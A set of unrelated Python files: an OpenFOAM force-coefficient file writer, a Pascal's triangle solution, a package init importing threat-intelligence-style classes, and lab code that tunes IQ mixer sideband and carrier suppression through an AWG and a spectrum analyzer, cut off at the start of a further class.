# #
#########################################################################
from __future__ import division
class genForceCoeffsFile:
#parameters: Parameters specified in the main driver
#rasModel: if the simulation is turbulent then specify the RAS model
def __init__(self, parameters):
self.parameters = parameters
self.Diam = parameters['Diam']
self.U = parameters['U']
self.geometry = 'cylinder'
self.thick = parameters['thickness']
self.CofR = [10*self.Diam, 10*self.Diam, self.thick/2]
self.lRef = self.Diam
if parameters["topology"] == "2D":
self.Aref = self.Diam * 0.5
elif parameters["topology"] == "3D":
self.Aref = self.Diam * self.thick
self.liftDir = [0, 1, 0]
self.dragDir = [1, 0, 0]
self.pitchAxis = [0, 0, 1]
def writeForceCoeffsFile(self):
forceCoeffsFile = open("forceCoeffs", "w")
forceCoeffsFile.write("/*--------------------------------*-C++-*------------------------------*\\")
forceCoeffsFile.write("\n| ========== | |")
forceCoeffsFile.write("\n| \\\\ / F ield | OpenFoam: The Open Source CFD Tooolbox |")
forceCoeffsFile.write("\n| \\\\ / O peration | Version: check the installation |")
forceCoeffsFile.write("\n| \\\\ / A nd | Website: www.openfoam.com |")
forceCoeffsFile.write("\n| \\\\/ M anipulation | |")
forceCoeffsFile.write("\n\\*---------------------------------------------------------------------*/")
forceCoeffsFile.write("\n\nforceCoeffs1")
forceCoeffsFile.write("\n{")
forceCoeffsFile.write("\n type forceCoeffs;")
forceCoeffsFile.write('\n libs ("libforces.so");')
forceCoeffsFile.write("\n writeControl timeStep;")
forceCoeffsFile.write("\n timeInterval 1;")
forceCoeffsFile.write("\n log yes;")
forceCoeffsFile.write("\n pRef 0;")
forceCoeffsFile.write("\n patches (" + self.geometry + ");")
forceCoeffsFile.write("\n rho rhoInf;")
forceCoeffsFile.write("\n rhoInf "+ str(self.parameters['rho']) +";")
forceCoeffsFile.write("\n liftDir (" + str(self.liftDir[0]) + " " + str(self.liftDir[1]) + " " + str(self.liftDir[2]) + ");")
forceCoeffsFile.write("\n dragDir (" + str(self.dragDir[0]) + " " + str(self.dragDir[1]) + " " + str(self.dragDir[2]) + ");")
forceCoeffsFile.write("\n CofR (" + str(self.CofR[0]) + " " + str(self.CofR[1]) + " " + str(self.CofR[2]) + ");")
forceCoeffsFile.write("\n pitchAxis (" + str(self.pitchAxis[0]) + " " + str(self.pitchAxis[1]) + " " + str(self.pitchAxis[2]) + ");")
forceCoeffsFile.write("\n magUInf "+ str(self.U) + ";")
forceCoeffsFile.write("\n lRef " + str(self.Diam) + ";")
forceCoeffsFile.write("\n Aref " + str(self.Aref) + ";")
forceCoeffsFile.write("\n /*binData")
forceCoeffsFile.write("\n {")
forceCoeffsFile.write("\n nBin 20;")
forceCoeffsFile.write("\n direction (1 0 0);")
forceCoeffsFile.write("\n cumulative yes;")
forceCoeffsFile.write("\n }*/")
forceCoeffsFile.write("\n}")
forceCoeffsFile.write("\n\npressureCoeff1")
forceCoeffsFile.write("\n{")
forceCoeffsFile.write("\n type pressure;")
forceCoeffsFile.write('\n libs ("libfieldFunctionObjects.so");')
forceCoeffsFile.write("\n writeControl writeTime;")
forceCoeffsFile.write("\n timeInterval " + str(self.parameters['writeInterval'] )+ ";")
forceCoeffsFile.write("\n log yes;")
forceCoeffsFile.write("\n patch (" + str(self.geometry) + ");")
forceCoeffsFile.write("\n rhoInf " + str(self.parameters['rho']) +";")
forceCoeffsFile.write("\n mode totalCoeff;")
forceCoeffsFile.write("\n pRef 0;")
forceCoeffsFile.write("\n pInf 0;")
forceCoeffsFile.write("\n UInf ("+ str(self.U) + " 0 0);")
forceCoeffsFile.write("\n}")
forceCoeffsFile.write("\n\n// ******************************************************************* //")
|
nilq/baby-python
|
python
|
# https://leetcode.com/problems/pascals-triangle/
class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
if numRows == 0:
return []
if numRows == 1:
return [[1]]
if numRows == 2:
return [[1], [1, 1]]
res = [[1], [1, 1]]
for i in range(2, numRows):
temp = [1]
for j in range(1, i):
temp.append(res[i-1][j-1] + res[i-1][j])
temp.append(1)
res.append(temp)
return res
|
nilq/baby-python
|
python
|
from .c2_server import C2Server
from .malware import Malware
from .actor import Actor
from .family import Family
|
nilq/baby-python
|
python
|
import numpy as np
from IPython.display import clear_output
import itertools as it
import pylabnet.hardware.spectrum_analyzer.agilent_e4405B as sa_hardware
import time
import pandas as pd
import seaborn as sns
import matplotlib
import matplotlib.pyplot as plt
from IPython.display import clear_output, display
class Optimizer:
def __init__(self):
pass
class IQOptimizer(Optimizer):
def __init__(
self, mw_source, hd, sa, carrier, signal_freq, max_iterations=5, max_lower_sideband_pow=-58, max_carrier_pow=-58, num_points=25, cushion_param=5,
param_guess=([60, 0.6, 0.65, -0.002, 0.006]), phase_window=44, q_window=0.34, dc_i_window=0.0135,
dc_q_window=0.0115, plot_traces=True, awg_delay_time=0.0, averages=1, min_rounds=1, HDAWG_ports=[3, 4],
oscillator=2):
""" Instantiate IQ optimizer
:param mw_source: instance of HMC_T2220 client
:param hd: instance of AWG client
:param sa: instance of spectrum analyzer client
:param carrier: desired carrier frequency (in Hz)
:param signal_freq: desired signal frequency (in Hz)
:kwarg num_points: number of points for scan window
:kwarg plot_traces: user decides if displaying power vs. frequency plots is desired
:kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
:kwarg max_lower_sideband_pow: desired upper bound for lower sideband power (in dBm)
:kwarg max_carrier_pow: desired upper bound for carrier power (in dBm)
:kwarg cushion_param: positive real number positively correlated with speed of zooming in on minimum
:kwarg param_guess: starting parameters for optimization:
([phase shift, q := (amp_i/amp_q) amplitude imbalance, a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q])
:kwarg phase_window: size of initial phase scan (in degrees)
:q_window: size of initial amplitude imbalance scan window (unitless)
:dc_i_window: size of initial dc i offset scan window (in V)
:dc_q_window: size of initial dc q offset scan window (in V)
"""
# Configure hd settings
# Assign oscillator 1 to sine output 2
#hd.seti('sines/1/oscselect', 1)
# Set carrier frequency
hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq)
# Set I and Q amplitude, calculate from q and a0 in the param_guess array
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1])))
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 2 * param_guess[2] * (1 / (1 + param_guess[1])))
# Set phase offset between I and Q
hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0])
# Enable sine waves
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1)
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1)
self.mw_source = mw_source
self.hd = hd
self.sa = sa
self.carrier = carrier
self.signal_freq = signal_freq
self.num_points = num_points
self.max_iterations = max_iterations
self.plot_traces = plot_traces
self.cushion_param = cushion_param
self.HDAWG_ports = HDAWG_ports
#Set mw freq
self.mw_source.output_on()
self.mw_source.set_freq(self.carrier)
#Instantiate IQ Optimizer sweep window
self.phase_min = param_guess[0] - phase_window / 2
self.phase_max = param_guess[0] + phase_window / 2
self.q_min = param_guess[1] - q_window / 2
self.q_max = param_guess[1] + q_window / 2
self.a0 = param_guess[2]
self.dc_min_i = param_guess[3] - dc_i_window / 2
self.dc_max_i = param_guess[3] + dc_i_window / 2
self.dc_min_q = param_guess[4] - dc_q_window / 2
self.dc_max_q = param_guess[4] + dc_q_window / 2
# Instantiate params we will optimize
self.opt_phase = None
self.opt_q = None
self.amp_q_opt = None
self.amp_i_opt = None
self.dc_offset_i_opt = None
self.dc_offset_q_opt = None
# Instantiate arrays and bounds
self.phases = np.linspace(self.phase_min, self.phase_max, self.num_points)
self.qs = np.linspace(self.q_min, self.q_max, self.num_points)
self.lower_sideband_power = np.zeros((self.num_points, self.num_points))
self.opt_lower_sideband_pow = float("inf")
self.opt_carrier_pow = float("inf")
self.max_lower_sideband_pow = max_lower_sideband_pow
self.max_carrier_pow = max_carrier_pow
# Instantiate and set markers
self.upp_sb_marker = None
self.lower_sb_marker = None
self.carrier_marker = None
self.set_markers()
self._AWG_DELAY_TIME = awg_delay_time
self._averages = averages
self._min_rounds = min_rounds
def set_markers(self):
# Configure hd to enable outputs
# self.hd.enable_output(0)
# self.hd.enable_output(1)
# Center frequency at carrier frequency
self.sa.set_center_frequency(self.carrier + self.signal_freq)
self.sa.set_frequency_span(6 * self.signal_freq)
# Marker for upper sideband.
self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)
# define target frequencies
markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
target_freqs = np.array([self.carrier + self.signal_freq, self.carrier - self.signal_freq, self.carrier])
max_deviation = 1e6
for marker, target_freq in zip(markers, target_freqs):
time.sleep(1)
marker.set_freq(target_freq)
#assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequecy: {marker_freq / 1e9} GHz"
self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.")
#Set reference level to just above the height of our signal to minimize our noise floor
self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)
if self.plot_traces == True:
self.sa.plot_trace()
def opt_lower_sideband(self):
# Rough sweep
self._sweep_phase_amp_imbalance()
self._set_optimal_vals()
# Instantiate local variables for the loop
q_max2 = self.q_max
q_min2 = self.q_min
phase_max2 = self.phase_max
phase_min2 = self.phase_min
num_iterations = 0
while (self.opt_lower_sideband_pow > self.max_lower_sideband_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations - 1:
q_cushion = np.abs(q_max2 - q_min2) / self.cushion_param
phase_cushion = np.abs(phase_max2 - phase_min2) / self.cushion_param
# Reset sweep window to zoom in on minimum
q_max2 = self.opt_q + q_cushion
q_min2 = self.opt_q - q_cushion
phase_max2 = self.opt_phase + phase_cushion
phase_min2 = self.opt_phase - phase_cushion
# Instantiate variables
self.phases = np.linspace(phase_min2, phase_max2, self.num_points)
self.qs = np.linspace(q_min2, q_max2, self.num_points)
self.lower_sideband_power = np.zeros((self.num_points, self.num_points))
self._sweep_phase_amp_imbalance()
self._set_optimal_vals()
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
else:
self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')
time.sleep(1)
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
if self.plot_traces == True:
# Heatmap plot
lower_sideband_data = pd.DataFrame(self.lower_sideband_power,
index=np.round(self.phases, 1),
columns=np.round(self.qs, 2))
fig1, ax1 = plt.subplots(figsize=(8, 5))
ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'lower sideband power [dBm]'})
ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance')
# Frequency plot
self.sa.plot_trace()
def opt_carrier(self):
num_iterations = 0
# If carrier power already below threshold, no need to optimize carrier
skipped = True
if self.carrier_marker.get_power() > (self.max_carrier_pow - 10):
skipped = False
# Sweep 2D parameter space of DC offsets and record carrier power
voltages_i = np.linspace(self.dc_min_i, self.dc_max_i, self.num_points)
voltages_q = np.linspace(self.dc_min_q, self.dc_max_q, self.num_points)
carrier_power = np.zeros((self.num_points, self.num_points))
self.opt_carrier_pow = self.carrier_marker.get_power()
dc_max_i2 = self.dc_max_i
dc_min_i2 = self.dc_min_i
dc_max_q2 = self.dc_max_q
dc_min_q2 = self.dc_min_q
while (self.opt_carrier_pow > self.max_carrier_pow or num_iterations < self._min_rounds) and num_iterations < self.max_iterations:
carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power)
# Retrieve optimal DC offsets
self.dc_offset_i_opt = voltages_i[np.where(carrier_power == np.amin(carrier_power))[0][0]]
self.dc_offset_q_opt = voltages_q[np.where(carrier_power == np.amin(carrier_power))[1][0]]
self.opt_carrier_pow = np.amin(carrier_power)
i_cushion = np.abs(dc_max_i2 - dc_min_i2) / self.cushion_param
q_cushion = np.abs(dc_max_q2 - dc_min_q2) / self.cushion_param
# Reset sweep window to zoom in on minimum
dc_max_i2 = self.dc_offset_i_opt + i_cushion
dc_min_i2 = self.dc_offset_i_opt - i_cushion
dc_max_q2 = self.dc_offset_q_opt + q_cushion
dc_min_q2 = self.dc_offset_q_opt - q_cushion
# Reinstantiate variables
voltages_i = np.linspace(dc_min_i2, dc_max_i2, self.num_points)
voltages_q = np.linspace(dc_min_q2, dc_max_q2, self.num_points)
num_iterations = num_iterations + 1
# Set optimal offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), self.dc_offset_i_opt)
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), self.dc_offset_q_opt)
time.sleep(1)
else:
print('Skipped Carrier')
self.dc_offset_i_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1))
self.dc_offset_q_opt = self.hd.getd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1))
if num_iterations < self.max_iterations:
self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()))
if self.plot_traces == True and not skipped:
# Heatmap plot
dc_sweep_data = pd.DataFrame(carrier_power, columns=np.round(voltages_q / 1e-3, 1), index=np.round(voltages_i / 1e-3, 1))
fig, ax = plt.subplots(figsize=(8, 5))
ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'carrier power [dBm]'})
ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]')
# Frequency plot
self.sa.plot_trace()
def opt(self):
self.opt_lower_sideband()
self.opt_carrier()
time.sleep(1)
self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(.5 * (self.amp_q_opt + self.amp_i_opt)) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
def _sweep_phase_amp_imbalance(self):
for i, j in it.product(range(self.num_points), repeat=2):
phase = self.phases[i]
q = self.qs[j]
# Calculate i and q amplitudes from q and a0
amp_i = 2 * q / (1 + q) * self.a0
amp_q = 2 * self.a0 / (1 + q)
# Set i and q amplitudes
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i)
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q)
# Set phaseshift
self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase)
#See sweep dc for explanation, basically allowing the point to update
if (i == 0 and j == 0):
time.sleep(1)
if (j == 0):
time.sleep(0.1)
else:
time.sleep(self._AWG_DELAY_TIME)
# Read lower sideband power
self.lower_sideband_power[i, j] = self._average_marker_power(self.lower_sb_marker)
def _average_marker_power(self, marker):
total_sum = 0
for i in range(self._averages):
total_sum = total_sum + marker.get_power()
return total_sum / self._averages
def _set_optimal_vals(self):
self.opt_phase = self.phases[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[0][0]]
self.opt_q = self.qs[np.where(self.lower_sideband_power == np.amin(self.lower_sideband_power))[1][0]]
self.opt_lower_sideband_pow = np.amin(self.lower_sideband_power)
self.amp_i_opt = 2 * self.opt_q / (1 + self.opt_q) * self.a0
self.amp_q_opt = 2 * self.a0 / (1 + self.opt_q)
# Set optimal I and Q amplitudes
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), self.amp_i_opt)
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), self.amp_q_opt)
# Set optimal phaseshift
self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), self.opt_phase)
def _sweep_dc_offsets(self, voltages_i, voltages_q, carrier_power):
for i, j in it.product(range(self.num_points), repeat=2):
# Set I DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), voltages_i[i])
# Set Q DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), voltages_q[j])
# Found a bug where the first few points in the matrix seem to be from the point before, i.e.
# the script is running faster then the spectrum analyzer can update
#So we are first going to set the offsets to the initial voltage and wait a bit for teh
#spectrum analyzer to update
if (i == 0 and j == 0):
time.sleep(1)
#Otherwise just a generic small delay which we empirically have found to work
if (j == 0):
time.sleep(0.1)
else:
time.sleep(self._AWG_DELAY_TIME)
# Read carrier power
carrier_power[i, j] = self._average_marker_power(self.carrier_marker)
return carrier_power, voltages_i, voltages_q
def plot_dc_offsets_sweep(self, dc_min_i, dc_max_i, dc_min_q, dc_max_q, num_points):
voltages_i = np.linspace(dc_min_i, dc_max_i, num_points)
voltages_q = np.linspace(dc_min_q, dc_max_q, num_points)
carrier_power = np.zeros((num_points, num_points))
dc_max_i2 = self.dc_max_i
dc_min_i2 = self.dc_min_i
dc_max_q2 = self.dc_max_q
dc_min_q2 = self.dc_min_q
carrier_power, voltages_i, voltages_q = self._sweep_dc_offsets(voltages_i, voltages_q, carrier_power)
dc_sweep_data = pd.DataFrame(carrier_power, columns=np.round(voltages_q / 1e-3, 1), index=np.round(voltages_i / 1e-3, 1))
fig, ax = plt.subplots(figsize=(8, 5))
ax = sns.heatmap(dc_sweep_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'carrier power [dBm]'})
ax.set(xlabel='DC offset Q signal [mV]', ylabel='DC offset I signal [mV]')
def plot_phase_amp_sweep(self, phase_min, phase_max, q_min, q_max, num_points):
self.phases = np.linspace(phase_min, phase_max, num_points)
self.qs = np.linspace(q_min, q_max, num_points)
self.lower_sideband_power = np.zeros((num_points, num_points))
self._sweep_phase_amp_imbalance()
lower_sideband_data = pd.DataFrame(self.lower_sideband_power,
index=np.round(self.phases, 1),
columns=np.round(self.qs, 2))
fig1, ax1 = plt.subplots(figsize=(8, 5))
ax1 = sns.heatmap(lower_sideband_data, xticklabels=5, yticklabels=5, cbar_kws={'label': 'lower sideband power [dBm]'})
ax1.set(ylabel='Phase shift', xlabel='Amplitude imbalance')
class IQOptimizer_GD(Optimizer):
def __init__(
self, mw_source, hd, sa, carrier, signal_freq, max_iterations=20, min_power=-65,
param_guess=([70, 0.975, 0.65, 0.05, -0.02]), phase_step=5, q_step=0.05, vi_step=0.005, vq_step=0.005,
plot_traces=True, awg_delay_time=0.1, averages=10, HDAWG_ports=[3, 4],
oscillator=2):
""" Instantiate IQ optimizer
:param mw_source: instance of microwave source client
:param hd: instance of AWG client
:param sa: instance of spectrum analyzer client
:param carrier: desired carrier frequency (in Hz)
:param signal_freq: desired signal frequency (in Hz)
:kwarg plot_traces: user decides if displaying power vs. iteration plots is desired
:kwarg max_iterations: maximum number of iterations to minimize carrier and lower sideband
:kwarg min_pow: noise floor
:kwarg param_guess: starting parameters for optimization:
([phase shift, q := (amp_i/amp_q) amplitude imbalance, a0 := (amp_i+amp_q)/2 average amplitude, dc_offset_i, dc_offset_q])
:kwarg phase_step: step size for phase parameter in gradient descent
:kwarg q_step: step size for amplitude imbalance parameter in gradient descent
:kwarg vi_step: step size for dc I offset parameter in gradient descent
:kwarg vq_step: step size for dc Q parameter in gradient descent
:kwarg awg_delay_time: time to wait after setting awg parameters
:kwarg averages: number of measurement for single point power measurement
:kwarg HDAWG_ports: which wave ports to use on the HDAWG
:kwarg oscillator: which oscillator to use on the HDAWG
"""
# Configure hd settings
# Assign oscillator 1 to sine output 2
#hd.seti('sines/1/oscselect', 1)
# Set carrier frequency
hd.setd('oscs/{}/freq'.format(oscillator - 1), signal_freq)
# Set I and Q amplitude, calculate from q and a0 in the param_guess array
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 2 * param_guess[2] * (param_guess[1] / (1 + param_guess[1])))
hd.setd('sines/{}/amplitudes/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 2 * param_guess[2] * (1 / (1 + param_guess[1])))
# Set phase offset between I and Q
hd.setd('sines/{}/phaseshift'.format(HDAWG_ports[0] - 1), param_guess[0])
# Enable sine waves
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[0] - 1, np.mod(HDAWG_ports[0] - 1, 2)), 1)
hd.seti('sines/{}/enables/{}'.format(HDAWG_ports[1] - 1, np.mod(HDAWG_ports[1] - 1, 2)), 1)
# set DC offsets
hd.setd('sigouts/{}/offset'.format(HDAWG_ports[0] - 1), param_guess[3])
hd.setd('sigouts/{}/offset'.format(HDAWG_ports[1] - 1), param_guess[4])
self.mw_source = mw_source
self.hd = hd
self.sa = sa
self.carrier = carrier
self.signal_freq = signal_freq
self.max_iterations = max_iterations
self.plot_traces = plot_traces
self.min_power = min_power
self.HDAWG_ports = HDAWG_ports
#Set mw freq
self.mw_source.output_on()
self.mw_source.set_freq(self.carrier)
#Instantiate step sizes
self.phase_step = phase_step
self.q_step = q_step
self.vi_step = vi_step
self.vq_step = vq_step
#Instantiate initial guesses
self.phase_guess = param_guess[0]
self.q_guess = param_guess[1]
self.a0 = param_guess[2]
self.dc_i_guess = param_guess[3]
self.dc_q_guess = param_guess[4]
# Instantiate params we will optimize
self.opt_phase = None
self.opt_q = None
self.amp_q_opt = None
self.amp_i_opt = None
self.dc_offset_i_opt = None
self.dc_offset_q_opt = None
# Instantiate arrays and bounds
self.opt_lower_sideband_pow = float("inf")
self.opt_carrier_pow = float("inf")
# Instantiate and set markers
self.upp_sb_marker = None
self.lower_sb_marker = None
self.carrier_marker = None
self.set_markers()
self._AWG_DELAY_TIME = awg_delay_time
self._averages = averages
def set_markers(self):
# Configure hd to enable outputs
# self.hd.enable_output(0)
# self.hd.enable_output(1)
# Center frequency at carrier frequency
self.sa.set_center_frequency(self.carrier + self.signal_freq)
self.sa.set_frequency_span(6 * self.signal_freq)
# Marker for upper sideband.
self.upp_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Upper Sideband', 1)
self.lower_sb_marker = sa_hardware.E4405BMarker(self.sa, 'Lower Sideband', 2)
self.carrier_marker = sa_hardware.E4405BMarker(self.sa, 'Carrier', 3)
# define target frequencies
markers = [self.upp_sb_marker, self.lower_sb_marker, self.carrier_marker]
target_freqs = np.array([self.carrier + self.signal_freq, self.carrier - self.signal_freq, self.carrier])
max_deviation = 1e6
for marker, target_freq in zip(markers, target_freqs):
time.sleep(1)
marker.set_freq(target_freq)
#assert abs(marker_freq - target_freq) < max_deviation, f"{marker.name} has wrong frequecy: {marker_freq / 1e9} GHz"
self.hd.log.info(f"Marker '{marker.name}' parked at {target_freq / 1e9:.4f} GHz reads {marker.get_power():.2f} dbm.")
#Set reference level to just above the height of our signal to minimize our noise floor
self.sa.set_reference_level(self.upp_sb_marker.get_power() + 2)
if self.plot_traces == True:
self.sa.plot_trace()
def opt_lower_sideband(self):
#gradient descent starting point
phase = self.phase_guess
q = self.q_guess
self.set_phase_and_amp(phase, q)
curr_power = self._average_marker_power(self.lower_sb_marker)
#store power values for every iteration
power_vec = [curr_power]
#initialize step sizes and iteration number
phase_step = self.phase_step
q_step = self.q_step
num_iterations = 0
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_phase_and_amp(phase, q, phase_step, q_step)
phase_new = phase - grad[0] * phase_step
q_new = q - grad[1] * q_step
self.set_phase_and_amp(phase_new, q_new)
new_power = self._average_marker_power(self.lower_sb_marker)
if new_power < curr_power:
curr_power = new_power
phase = phase_new
q = q_new
else:
phase_step = phase_step / 2
q_step = q_step / 2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Lower sideband optimization completed in ' + str(num_iterations + 1) + ' iterations')
else:
self.hd.log.info('Lower sideband optimization failed to reach threshold in ' + str(num_iterations + 1) + ' iterations')
time.sleep(1)
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.opt_phase = phase
self.opt_q = q
self.set_phase_and_amp(self.opt_phase, self.opt_q)
self.lower_sideband_power = self.lower_sb_marker.get_power()
if self.plot_traces == True:
plt.plot(power_vec, label='lower band')
def opt_carrier(self):
#gradient descent starting point
vi = self.dc_i_guess
vq = self.dc_q_guess
self.set_dc_offsets(vi, vq)
curr_power = self._average_marker_power(self.carrier_marker)
#store power values for every iteration
power_vec = [curr_power]
# initialize step sizes and iteration number
vi_step = self.vi_step
vq_step = self.vq_step
num_iterations = 0
while num_iterations < self.max_iterations and curr_power > self.min_power:
grad = self.calc_slope_dc_offsets(vi, vq, vi_step, vq_step)
vi_new = vi - grad[0] * vi_step
vq_new = vq - grad[1] * vq_step
self.set_dc_offsets(vi_new, vq_new)
new_power = self._average_marker_power(self.carrier_marker)
if new_power < curr_power:
curr_power = new_power
vi = vi_new
vq = vq_new
else:
vi_step = vi_step / 1.2
vq_step = vq_step / 1.2
power_vec.append(curr_power)
num_iterations = num_iterations + 1
if num_iterations < self.max_iterations:
self.hd.log.info('Carrier optimization completed in ' + str(num_iterations) + ' iterations')
else:
self.hd.log.info('Carrier optimization failed to reach threshold in ' + str(num_iterations) + ' iterations')
time.sleep(1)
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + 'dBm')
self.dc_offset_i_opt = vi
self.dc_offset_q_opt = vq
self.set_dc_offsets(self.dc_offset_i_opt, self.dc_offset_q_opt)
self.carrier_power = self.carrier_marker.get_power()
if self.plot_traces == True:
plt.plot(power_vec, label='carrier band')
plt.xlabel('iteration #')
plt.ylabel('power [dBm]')
plt.legend()
def opt(self):
self.opt_lower_sideband()
while self.lower_sideband_power > self.min_power + 7.5:
self.opt_lower_sideband()
self.opt_carrier()
while self.carrier_power > self.min_power + 7.5:
self.dc_i_guess = self.dc_offset_i_opt
self.dc_q_guess = self.dc_offset_q_opt
self.opt_carrier()
#for i in range(10):
# if self.carrier_power - 3.5 > self.lower_sideband_power:
# self.dc_i_guess = self.dc_offset_i_opt
# self.dc_q_guess = self.dc_offset_q_opt
# self.opt_carrier()
time.sleep(1)
self.hd.log.info('Optimized param_guess is ([' + str(self.opt_phase) + ',' + str(self.opt_q) + ',' + str(self.a0) + ',' + str(self.dc_offset_i_opt) + ',' + str(self.dc_offset_q_opt) + '])')
self.hd.log.info('Lower sideband power is ' + str(self.lower_sb_marker.get_power()) + ' dBm')
self.hd.log.info('Carrier power is ' + str(self.carrier_marker.get_power()) + ' dBm')
def set_phase_and_amp(self, phase, q):
amp_i = 2 * q / (1 + q) * self.a0
amp_q = 2 * self.a0 / (1 + q)
# Set i and q amplitudes
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[0] - 1, np.mod(self.HDAWG_ports[0] - 1, 2)), amp_i)
self.hd.setd('sines/{}/amplitudes/{}'.format(self.HDAWG_ports[1] - 1, np.mod(self.HDAWG_ports[1] - 1, 2)), amp_q)
# Set phaseshift
self.hd.setd('sines/{}/phaseshift'.format(self.HDAWG_ports[0] - 1), phase)
def set_dc_offsets(self, v1, v2):
# Set I DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[0] - 1), v1)
# Set Q DC-offset
self.hd.setd('sigouts/{}/offset'.format(self.HDAWG_ports[1] - 1), v2)
def _average_marker_power(self, marker):
total_sum = 0
for i in range(self._averages):
total_sum = total_sum + marker.get_power()
return total_sum / self._averages
def calc_slope_phase_and_amp(self, phase, q, phase_step, q_step):
self.set_phase_and_amp(phase + phase_step, q)
time.sleep(self._AWG_DELAY_TIME)
phase_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase - phase_step, q)
time.sleep(self._AWG_DELAY_TIME)
phase_m = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q + q_step)
time.sleep(self._AWG_DELAY_TIME)
q_p = self._average_marker_power(self.lower_sb_marker)
self.set_phase_and_amp(phase, q - q_step)
time.sleep(self._AWG_DELAY_TIME)
q_m = self._average_marker_power(self.lower_sb_marker)
return([(phase_p - phase_m) / 2, (q_p - q_m) / 2])
def calc_slope_dc_offsets(self, vi, vq, vi_step, vq_step):
self.set_dc_offsets(vi + vi_step, vq)
time.sleep(self._AWG_DELAY_TIME)
vi_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi - vi_step, vq)
time.sleep(self._AWG_DELAY_TIME)
vi_m = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq + vq_step)
time.sleep(self._AWG_DELAY_TIME)
vq_p = self._average_marker_power(self.carrier_marker)
self.set_dc_offsets(vi, vq - vq_step)
time.sleep(self._AWG_DELAY_TIME)
vq_m = self._average_marker_power(self.carrier_marker)
return([(vi_p - vi_m) / 2, (vq_p - vq_m) / 2])
class IQOptimizer_GD_multifreq(Optimizer):
def __init__(
